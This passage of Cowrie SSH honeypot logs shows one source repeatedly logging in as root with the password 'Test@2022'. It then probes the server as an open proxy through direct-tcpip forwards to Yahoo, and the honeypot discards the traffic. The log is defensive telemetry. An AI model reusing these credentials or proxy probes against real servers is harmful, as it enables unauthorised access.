,"hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:28.726733Z","src_ip":"213.209.150.239","session":"fcda999d8696"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:28.960909Z","src_ip":"213.209.150.239","session":"fcda999d8696"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":14526,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:14526","sensor":"my-vps","timestamp":"2025-08-26T01:00:29.009153Z","session":"fcda999d8696"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:29.056605Z","src_ip":"213.209.150.239","session":"fcda999d8696"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":6748,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:6748","sensor":"my-vps","timestamp":"2025-08-26T01:00:29.193375Z","session":"fcda999d8696"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:29.240631Z","src_ip":"213.209.150.239","session":"fcda999d8696"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:29.288475Z","src_ip":"213.209.150.239","session":"fcda999d8696"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":8759,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff7697062d56","protocol":"ssh","message":"New connection: 213.209.150.239:8759 (1.2.3.4:22) [session: ff7697062d56]","sensor":"my-vps","timestamp":"2025-08-26T01:00:29.344342Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:29.346553Z","src_ip":"213.209.150.239","session":"ff7697062d56"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:29.403385Z","src_ip":"213.209.150.239","session":"ff7697062d56"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:29.686151Z","src_ip":"213.209.150.239","session":"ff7697062d56"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":29989,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:29989","sensor":"my-vps","timestamp":"2025-08-26T01:00:29.744087Z","session":"ff7697062d56"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:29.800943Z","src_ip":"213.209.150.239","session":"ff7697062d56"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":14574,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:14574","sensor":"my-vps","timestamp":"2025-08-26T01:00:29.955136Z","session":"ff7697062d56"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:30.011841Z","src_ip":"213.209.150.239","session":"ff7697062d56"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:30.070001Z","src_ip":"213.209.150.239","session":"ff7697062d56"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":8817,"dst_ip":"1.2.3.4","dst_port":22,"session":"777ec16642dc","protocol":"ssh","message":"New connection: 213.209.150.239:8817 (1.2.3.4:22) [session: 777ec16642dc]","sensor":"my-vps","timestamp":"2025-08-26T01:00:30.125772Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:30.126446Z","src_ip":"213.209.150.239","session":"777ec16642dc"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:30.183184Z","src_ip":"213.209.150.239","session":"777ec16642dc"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:30.464991Z","src_ip":"213.209.150.239","session":"777ec16642dc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":11230,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:11230","sensor":"my-vps","timestamp":"2025-08-26T01:00:30.522444Z","session":"777ec16642dc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:30.579389Z","src_ip":"213.209.150.239","session":"777ec16642dc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":31404,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:31404","sensor":"my-vps","timestamp":"2025-08-26T01:00:30.735093Z","session":"777ec16642dc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:30.791863Z","src_ip":"213.209.150.239","session":"777ec16642dc"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:30.849581Z","src_ip":"213.209.150.239","session":"777ec16642dc"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":8874,"dst_ip":"1.2.3.4","dst_port":22,"session":"ed62eb8c09bd","protocol":"ssh","message":"New connection: 213.209.150.239:8874 (1.2.3.4:22) [session: ed62eb8c09bd]","sensor":"my-vps","timestamp":"2025-08-26T01:00:30.895733Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:30.896535Z","src_ip":"213.209.150.239","session":"ed62eb8c09bd"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:30.943838Z","src_ip":"213.209.150.239","session":"ed62eb8c09bd"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:31.178751Z","src_ip":"213.209.150.239","session":"ed62eb8c09bd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":14268,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:14268","sensor":"my-vps","timestamp":"2025-08-26T01:00:31.227607Z","session":"ed62eb8c09bd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:31.275059Z","src_ip":"213.209.150.239","session":"ed62eb8c09bd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":10277,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:10277","sensor":"my-vps","timestamp":"2025-08-26T01:00:31.409917Z","session":"ed62eb8c09bd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:31.457370Z","src_ip":"213.209.150.239","session":"ed62eb8c09bd"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:31.505813Z","src_ip":"213.209.150.239","session":"ed62eb8c09bd"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":8918,"dst_ip":"1.2.3.4","dst_port":22,"session":"a0f72a864666","protocol":"ssh","message":"New connection: 213.209.150.239:8918 (1.2.3.4:22) [session: a0f72a864666]","sensor":"my-vps","timestamp":"2025-08-26T01:00:31.551689Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:31.552350Z","src_ip":"213.209.150.239","session":"a0f72a864666"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:31.599800Z","src_ip":"213.209.150.239","session":"a0f72a864666"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:31.834888Z","src_ip":"213.209.150.239","session":"a0f72a864666"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50587,"dst_ip":"1.2.3.4","dst_port":23,"session":"e2d5f1408799","protocol":"telnet","message":"New connection: 212.227.235.229:50587 (1.2.3.4:23) [session: e2d5f1408799]","sensor":"my-vps","timestamp":"2025-08-26T01:00:31.837550Z"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":30184,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:30184","sensor":"my-vps","timestamp":"2025-08-26T01:00:31.883036Z","session":"a0f72a864666"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:31.930311Z","src_ip":"212.227.235.229","session":"86aef0b0527f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:31.931147Z","src_ip":"213.209.150.239","session":"a0f72a864666"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":22751,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:22751","sensor":"my-vps","timestamp":"2025-08-26T01:00:32.066077Z","session":"a0f72a864666"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:32.113602Z","src_ip":"213.209.150.239","session":"a0f72a864666"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:32.161630Z","src_ip":"213.209.150.239","session":"a0f72a864666"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":8963,"dst_ip":"1.2.3.4","dst_port":22,"session":"b64a47564bb8","protocol":"ssh","message":"New connection: 213.209.150.239:8963 (1.2.3.4:22) [session: b64a47564bb8]","sensor":"my-vps","timestamp":"2025-08-26T01:00:32.207531Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:32.208627Z","src_ip":"213.209.150.239","session":"b64a47564bb8"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:32.255816Z","src_ip":"213.209.150.239","session":"b64a47564bb8"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:32.490715Z","src_ip":"213.209.150.239","session":"b64a47564bb8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":5168,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:5168","sensor":"my-vps","timestamp":"2025-08-26T01:00:32.539277Z","session":"b64a47564bb8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:32.586396Z","src_ip":"213.209.150.239","session":"b64a47564bb8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":21576,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:21576","sensor":"my-vps","timestamp":"2025-08-26T01:00:32.721361Z","session":"b64a47564bb8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:32.768425Z","src_ip":"213.209.150.239","session":"b64a47564bb8"}
